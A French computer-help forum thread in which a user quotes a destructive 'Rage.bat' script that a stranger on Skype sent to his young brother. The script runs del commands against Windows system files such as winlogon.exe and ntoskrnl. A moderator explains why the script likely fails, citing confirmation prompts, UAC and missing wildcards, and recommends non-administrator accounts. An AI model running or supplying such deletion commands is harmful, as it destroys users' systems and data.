(Faux) virus .bat et GROS DOUTE !!!!! HELP ME PLZ !!!! :(
Résolu
Arlan64
Messages postés
110
Date d'inscription
Statut
Membre
Dernière intervention
-
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour,
Mon petit frère de 9 ans à donné notre adresse IP sans savoir que c'était DANGEREUX à un faux pote sur Skype ! Ensuite, le faux pote lui a envoyé un fichier (Rage.bat) que mon petit frère a exécuté. Voici ce que le fichier contenait:
@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlogon.exe"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl"
Un vrai pote de mon petit frère lui avait dit que si on a exécuté le fichier Rage.bat et qu'on éteint l'ordinateur, il ne pourra plu jamais se rallumer. Et c'est là où j'ai eu Le Doute EXTRÊME !!!!!! J'ai peur de tout perdre et de ne plus pouvoir utiliser mes fichiers etc... Est-ce vrai cette histoire ? S'il vous plaît, aidez-moi ! :/
Merci.
Mon petit frère de 9 ans à donné notre adresse IP sans savoir que c'était DANGEREUX à un faux pote sur Skype ! Ensuite, le faux pote lui a envoyé un fichier (Rage.bat) que mon petit frère a exécuté. Voici ce que le fichier contenait:
@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlogon.exe"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl"
Un vrai pote de mon petit frère lui avait dit que si on a exécuté le fichier Rage.bat et qu'on éteint l'ordinateur, il ne pourra plu jamais se rallumer. Et c'est là où j'ai eu Le Doute EXTRÊME !!!!!! J'ai peur de tout perdre et de ne plus pouvoir utiliser mes fichiers etc... Est-ce vrai cette histoire ? S'il vous plaît, aidez-moi ! :/
Merci.
A voir également:
- Faux virus
- Fichier bat - Guide
- Softonic virus - Forum Virus
- Bat to exe converter - Télécharger - Édition & Programmation
- Virus mcafee - Accueil - Piratage
- Postmaster outlook virus - Forum Virus
5 réponses
Salut,
Normalement le .bat affiche un message "voulez-vous être sûr de supprimer", vu que la commande del n'a pas le paramètre pour masquer ce message.
En plus, pour que ça fonctionne, il faut lancer le .bat par un clic droit exécuter en tant qu'administrateur, sinon le script ne sera pas lancé avec le jeton administrateur.
Ensuite, il est très facile de protéger ton frère de ce genre de mésaventure et autres pourrissements de l'ordinateur.
il suffit de ne pas lui donner de sessions administrateurs.
=> c'est expliqué là pour gérer les utilisateurs Windows : https://www.malekal.com/utilisateurs-sessions-windows/
Veuillez appuyer sur une touche pour continuer la désinfection...
Normalement le .bat affiche un message "voulez-vous être sûr de supprimer", vu que la commande del n'a pas le paramètre pour masquer ce message.
En plus, pour que ça fonctionne, il faut lancer le .bat par un clic droit exécuter en tant qu'administrateur, sinon le script ne sera pas lancé avec le jeton administrateur.
Ensuite, il est très facile de protéger ton frère de ce genre de mésaventure et autres pourrissements de l'ordinateur.
il suffit de ne pas lui donner de sessions administrateurs.
=> c'est expliqué là pour gérer les utilisateurs Windows : https://www.malekal.com/utilisateurs-sessions-windows/
Veuillez appuyer sur une touche pour continuer la désinfection...
Surtout qu'il est mal écrit, il manque les * à la fin des chemins.
et encore une fois, si l'UAC est activé, et il l'est par défaut, si tu doubles-clics dessus, ça ne fonctionnera pas.